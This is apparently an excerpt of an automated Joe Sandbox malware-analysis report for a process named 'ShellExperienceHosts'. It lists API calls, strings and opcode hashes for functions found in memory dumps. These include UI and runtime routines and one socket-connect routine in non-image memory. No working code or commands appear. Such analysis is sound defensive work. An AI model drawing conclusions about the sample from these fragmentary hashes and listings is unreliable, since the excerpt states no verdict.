                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Iconic
                                                                            • String ID:
                                                                            • API String ID: 110040809-0
                                                                            • Opcode ID: e2c4ded0c280adb0d356b4f80c7ff7a219e1f024b19f09cfcaf442ddebf4c313
                                                                            • Instruction ID: 144f2274777b5717ae5fe4aa65f67fc9c7be41060818e2866ecfb4bcc4c624f6
                                                                            • Opcode Fuzzy Hash: e2c4ded0c280adb0d356b4f80c7ff7a219e1f024b19f09cfcaf442ddebf4c313
                                                                            • Instruction Fuzzy Hash: E0E026333640112FE6085A39ED4CBBA63A9FB81216F10093DE0A7C3ED0DF50AC0AC360
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfce4a1a5e8fd92abbba4c6a44f6adf7b218211a2e35efd4732c1bdd9f67e9cb
                                                                            • Instruction ID: 09532438ba10e7617217de39516c4a61b438b244b38913d2dc1d867769fa7819
                                                                            • Opcode Fuzzy Hash: dfce4a1a5e8fd92abbba4c6a44f6adf7b218211a2e35efd4732c1bdd9f67e9cb
                                                                            • Instruction Fuzzy Hash: F1226277E5161A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE78BA478BC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c01553f6f512b2846d959305e748f2a9f08dd86951aa6911af8f98a71cd808d6
                                                                            • Instruction ID: 1fbda720ec1ede8368fdaf301ed13ba8313efac2c07f57068fc8095178a0a154
                                                                            • Opcode Fuzzy Hash: c01553f6f512b2846d959305e748f2a9f08dd86951aa6911af8f98a71cd808d6
                                                                            • Instruction Fuzzy Hash: 602248B0A10B06CFD729CFA9C584A9ABBF1FF48304F248A6DD85A97755D330E981CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0310cf5ebc2e2a90283327764d4546fd3d9aec9e33a65a2a1938e8938fd551d8
                                                                            • Instruction ID: 46aba43d61a3401ed6b931d652764705ff9eae85ee7bc98b977ef39eed3baf7b
                                                                            • Opcode Fuzzy Hash: 0310cf5ebc2e2a90283327764d4546fd3d9aec9e33a65a2a1938e8938fd551d8
                                                                            • Instruction Fuzzy Hash: 1B2227B8A00B059FD728CF69C580AAABBF1FF4C305F148A6DD95A97755D330E885CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd1aac542edc429d71cb518c643d948f271d959a540291e137b2a1eb494a4d59
                                                                            • Instruction ID: 2b292d67738a661b41edc23555cb399273e1fd13aa35a07526957213b8421849
                                                                            • Opcode Fuzzy Hash: dd1aac542edc429d71cb518c643d948f271d959a540291e137b2a1eb494a4d59
                                                                            • Instruction Fuzzy Hash: 44519C72D00119AFDF14CF99C940AEEBBB6EFC8304F5984A8E914AB201D7749A60CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                            • Instruction ID: 55fd0432218e3e8e5a8d35ee1a317f7b7b2d6b4a5daaba662217c7270f0e7f38
                                                                            • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                            • Instruction Fuzzy Hash: B331A1B5A143478FC311DF58C480966B7E5FF89318F09056DE88587316E370FA55CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction ID: 92efcbf5f5fdfc1d983a4a304e39de60a311e0208767d66b21af1e5acc1e87b6
                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction Fuzzy Hash: DC119EB724204947D6509F3EC6B46B7E39DEBC532CB38CF76E0528BE56D2AB900C9500
                                                                            APIs
                                                                            • RegisterClipboardFormatW.USER32(Native), ref: 6C75D780
                                                                            • RegisterClipboardFormatW.USER32(OwnerLink), ref: 6C75D78D
                                                                            • RegisterClipboardFormatW.USER32(ObjectLink), ref: 6C75D79B
                                                                            • RegisterClipboardFormatW.USER32(Embedded Object), ref: 6C75D7A9
                                                                            • RegisterClipboardFormatW.USER32(Embed Source), ref: 6C75D7B7
                                                                            • RegisterClipboardFormatW.USER32(Link Source), ref: 6C75D7C5
                                                                            • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 6C75D7D3
                                                                            • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 6C75D7E1
                                                                            • RegisterClipboardFormatW.USER32(FileName), ref: 6C75D7EF
                                                                            • RegisterClipboardFormatW.USER32(FileNameW), ref: 6C75D7FD
                                                                            • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 6C75D80B
                                                                            • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 6C75D819
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister
                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                            • API String ID: 1228543026-2889995556
                                                                            • Opcode ID: b82d44454dff37c31761afe61ffb8620e67b66d3d4404d5f1e0800e90a3dffe9
                                                                            • Instruction ID: e0831267d9d4c221a948331e6f47f8d8167e47849d24908b75adc24e80f3bd6e
                                                                            • Opcode Fuzzy Hash: b82d44454dff37c31761afe61ffb8620e67b66d3d4404d5f1e0800e90a3dffe9
                                                                            • Instruction Fuzzy Hash: 2C114A71E527209FCB305FB19A4C4067BB0AA0661B3408D6EA15B97A00D738E844DF96
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ACE
                                                                            • __mtterm.LIBCMT ref: 10009ADA
                                                                              • Part of subcall function 100097A5: DecodePointer.KERNEL32(00000008,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097B6
                                                                              • Part of subcall function 100097A5: TlsFree.KERNEL32(00000021,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097D0
                                                                              • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C031
                                                                              • Part of subcall function 100097A5: _free.LIBCMT ref: 1000C034
                                                                              • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000021,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C05B
                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009AF0
                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009AFD
                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009B0A
                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009B17
                                                                            • TlsAlloc.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B67
                                                                            • TlsSetValue.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B82
                                                                            • __init_pointers.LIBCMT ref: 10009B8C
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B9D
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BAA
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BB7
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BC4
                                                                            • DecodePointer.KERNEL32(Function_00009929,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BE5
                                                                            • __calloc_crt.LIBCMT ref: 10009BFA
                                                                            • DecodePointer.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009C14
                                                                            • GetCurrentThreadId.KERNEL32 ref: 10009C26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                            • API String ID: 3698121176-3819984048
                                                                            • Opcode ID: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
                                                                            • Instruction ID: 476fdbd6443a42851c863cb18b7173c2f7dcf4e8a02e7ba59ea7a710cfe5bbe7
                                                                            • Opcode Fuzzy Hash: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
                                                                            • Instruction Fuzzy Hash: 94313B35840A35EAF721DF758D88B1A3EE6EB493A1B14C526E414D72B4FB36D481CF50
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C73CED6
                                                                            • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C73CF00
                                                                            • GetCapture.USER32 ref: 6C73CF16
                                                                            • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C73CF25
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Capture
                                                                            • String ID: #32768$AfxOldWndProc423
                                                                            • API String ID: 1665607226-2141921550
                                                                            • Opcode ID: 20e4df5b97c87d5f40095a38a7ba68ccd21b5f8b0ee04d498f71d87b698d4252
                                                                            • Instruction ID: 638860b09066db30bf3e42b701d5ad80eb9c13f1199e0996607fc69d42926fea
                                                                            • Opcode Fuzzy Hash: 20e4df5b97c87d5f40095a38a7ba68ccd21b5f8b0ee04d498f71d87b698d4252
                                                                            • Instruction Fuzzy Hash: C281E271A00239ABDF215F64CE8CFAA7B78AF59759F1001B4F919A7682CB349D01CB94
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C710F8B
                                                                            • GetParent.USER32(?), ref: 6C71104A
                                                                            • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C71106F
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C7110DD
                                                                            • BringWindowToTop.USER32(?), ref: 6C711103
                                                                            • GetParent.USER32(?), ref: 6C711191
                                                                            • GetParent.USER32(?), ref: 6C71121F
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 6C71123F
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 6C711281
                                                                            • UpdateWindow.USER32(?), ref: 6C71128A
                                                                            • GetSystemMenu.USER32(?,00000000), ref: 6C7112EE
                                                                            • GetMenuItemInfoW.USER32(?,0000F060,00000000,00000030), ref: 6C711333
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C71138B
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7113A9
                                                                            • GetParent.USER32(?), ref: 6C7113B2
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 6C7113DF
                                                                              • Part of subcall function 6C713C23: GetParent.USER32(?), ref: 6C713C8A
                                                                              • Part of subcall function 6C713C23: SendMessageW.USER32(?,00000222,?,00000000), ref: 6C713CA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ParentWindow$MessageSend$MenuRectRedraw$BringH_prolog3_InfoInvalidateItemSystemUpdate
                                                                            • String ID: 0
                                                                            • API String ID: 1054027295-4108050209
                                                                            • Opcode ID: ed795cc4d3cf5bac92bf0f39bdb44794f0a202f32d6f528100bd210d8c7a5782
                                                                            • Instruction ID: 6785396a14e7e3c00fb7bf266993dd2ef213ab025073438676f3b0e05ac90ff6
                                                                            • Opcode Fuzzy Hash: ed795cc4d3cf5bac92bf0f39bdb44794f0a202f32d6f528100bd210d8c7a5782
                                                                            • Instruction Fuzzy Hash: 10E1B631B05616EFDF159B60CA5CBADB775BF49318F180239E426ABBD0DB30A815CB90
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C76CC25
                                                                            • IsWindow.USER32(?), ref: 6C76CCBC
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76CE61
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76CE92
                                                                            • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C76CF18
                                                                            • SendMessageW.USER32(?,0000041C,00000000,?), ref: 6C76CF59
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76CFCC
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76CFE2
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76CFFD
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76D06C
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76D082
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76D09C
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76CE77
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            • AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 6C76D186
                                                                            • GetWindow.USER32(?,00000005), ref: 6C76D1B6
                                                                            • AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 6C76D231
                                                                            • GetMenuItemCount.USER32(?), ref: 6C76D275
                                                                            • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6C76D28B
                                                                            • AppendMenuW.USER32(?,00000000,00000000,?), ref: 6C76D2A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Append$CountItem$MessageSendWindow$CtrlH_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 465015882-0
                                                                            • Opcode ID: 4d2b0b9f7edd25d5847e29bfc064217ff0bd461abce9ffa0f2b4ea6155f97915
                                                                            • Instruction ID: b7fce6e6232660a08331e1792b3c753b5e055fa2170b384f0e996a35fcdcc5e9
                                                                            • Opcode Fuzzy Hash: 4d2b0b9f7edd25d5847e29bfc064217ff0bd461abce9ffa0f2b4ea6155f97915
                                                                            • Instruction Fuzzy Hash: 9E02A130A00218DFDF25DB65CA58BADBB75BF45308F2440A9E809A7B91DF31AD45CF94
                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 02232D72
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02232D7E
                                                                            • timeGetTime.WINMM ref: 02232D84
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02232DB1
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02232DDD
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02232DE9
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02232E08
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02232E14
                                                                            • gethostbyname.WS2_32(00000000), ref: 02232E22
                                                                            • htons.WS2_32(?), ref: 02232E44
                                                                            • connect.WS2_32(?,?,00000010), ref: 02232E62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                            • Instruction ID: c83599afeb021e2a00d8e4c566914774c004ea771565e44cb39688bba1454d1e
                                                                            • Opcode Fuzzy Hash: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                            • Instruction Fuzzy Hash: 32617FB1A40304BFE721DFA4CC85FAAB7B9FF48711F104619FA45AB2D0D7B1A9048B64
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C8168E1
                                                                            • GetCursorPos.USER32(?), ref: 6C81699A
                                                                            • IsRectEmpty.USER32(?), ref: 6C8169CE
                                                                            • IsRectEmpty.USER32(?), ref: 6C8169F5
                                                                            • IsRectEmpty.USER32(?), ref: 6C816A17
                                                                            • GetWindowRect.USER32(?,?), ref: 6C816A45
                                                                            • GetWindowRect.USER32(?,?), ref: 6C816A75
                                                                            • PtInRect.USER32(?,?,?), ref: 6C816AC2
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 6C816ADA
                                                                              • Part of subcall function 6C6E693E: __EH_prolog3.LIBCMT ref: 6C6E6945
                                                                              • Part of subcall function 6C6E693E: SetRectEmpty.USER32 ref: 6C6E6A45
                                                                              • Part of subcall function 6C6E693E: SetRectEmpty.USER32(?), ref: 6C6E6A4C
                                                                            • SetRectEmpty.USER32(?), ref: 6C816AFD
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C816C8E
                                                                            • IsRectEmpty.USER32(?), ref: 6C816CAE
                                                                            • IsRectEmpty.USER32(?), ref: 6C816CE1
                                                                            • PtInRect.USER32(?,00000000,00000000), ref: 6C816CF5
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C816D21
                                                                            • IsRectEmpty.USER32(?), ref: 6C816D40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 359163869-0
                                                                            • Opcode ID: fde96ade99ed71408c22db328583604b5b99cee076d8eaa3435bf6f372f546fc
                                                                            • Instruction ID: fa6a383f820a1e1fefc88970810d03086a559e8e3da3160fae589b5b97f02915
                                                                            • Opcode Fuzzy Hash: fde96ade99ed71408c22db328583604b5b99cee076d8eaa3435bf6f372f546fc
                                                                            • Instruction Fuzzy Hash: 29E1D231A04216DFCF25CFA4CA84AAEBBF9FF45308F144569E845EBA45DB31E905CB90
                                                                            APIs
